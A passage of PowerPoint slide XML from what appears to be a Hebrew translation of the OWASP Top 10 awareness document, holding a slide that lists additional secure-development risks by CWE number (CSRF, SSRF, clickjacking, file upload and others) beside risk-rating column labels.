                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>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algn="ctr" rtl="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="800" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>יישום ספציפי</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRP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ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>4.0</a:t>
                      </a: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xmlns="" val="10010"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="15" name="Table 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2451894884"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="6687235"/>
          <a:ext cx="6858000" cy="2456765"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6858000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="347209">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1600" b="1" dirty="0" smtClean="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>סיכונים נוספים שיש לשקול</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr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xmlns="" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="2109556">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>מסמך עשרות הפגיעויות מכסה שטח רחב, אך קיימים סיכונים רבים נוספים אשר עליך לשקול ולהעריך בארגון שלך.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t/>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>חלק מהם הופיעו בגרסאות הקודמות של מסמכי ה-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, ואחרים לא הופיעו, לרבות דרכי תקיפה חדשות אשר מתגלות כל הזמן. סיכוני פיתוח מאובטח חשובים אחרים (מדורגים עפ"י </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>CWE-ID</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>) אשר מומלץ לך לשקול כוללים:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" marR="0" indent="-82800" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>CWE-352</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>: Cross-Site Request Forgery (CSRF)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" baseline="0" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" marR="0" indent="-82800" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>CWE-400: Uncontrolled Resource Consumption ('Resource Exhaustion', '</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>AppDoS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>')</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" baseline="0" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" marR="0" indent="-82800" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>CWE-434: Unrestricted Upload of File with Dangerous Type</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" baseline="0" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" marR="0" indent="-82800" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>CWE-451: User Interface (UI) Misrepresentation of Critical Information (Clickjacking and others)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" baseline="0" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" marR="0" indent="-82800" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>CWE-601: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>Unvalidated</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t> Forward and Redirects</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" baseline="0" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" marR="0" indent="-82800" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>CWE-799: Improper Control of Interaction Frequency (Anti-Automation)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" baseline="0" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" marR="0" indent="-82800" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId10"/>
                        </a:rPr>
                        <a:t>CWE-829: Inclusion of Functionality from Untrusted Control Sphere (3rd Party Content)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" baseline="0" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" marR="0" indent="-82800" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId11"/>
                        </a:rPr>
                        <a:t>CWE-918: Server-Side Request Forgery (SSRF)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" baseline="0" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcP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xmlns="" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Rectangle 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2819400" y="2627763"/>
            <a:ext cx="995283" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>שכיחות</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Rectangle 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3897232" y="2627763"/>
            <a:ext cx="903369" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>יכולת גילוי</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Rectangle 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1759009" y="2627763"/>
            <a:ext cx="956796" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>יכולת ניצול</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Rectangle 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4952356" y="2627763"/>
            <a:ext cx="869908" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>השפעה טכנית</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="36" name="Group 35"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219200" y="2262187"/>
            <a:ext cx="4887049" cy="567086"/>
            <a:chOff x="430949" y="1049627"/>
            <a:chExt cx="5604445" cy="633788"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="Rectangle 116"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2991920" y="1073877"/>
              <a:ext cx="1020368" cy="381000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="95000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="65000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="1">
              <a:schemeClr val="accent1"/>
            </a:lnRef>
            <a:fillRef idx="2">
              <a:schemeClr val="accent1"/>
            </a:fillRef>
            <a:effectRef idx="1">
              <a:schemeClr val="accent1"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="dk1"/>
            </a:fontRef>
          </p:style>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="216000" rIns="36000" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" rtl="1" eaLnBrk="0" hangingPunct="0"/>
              <a:r>
                <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>חולשת</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t/>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>אבטחה</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="40" name="Group 63"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
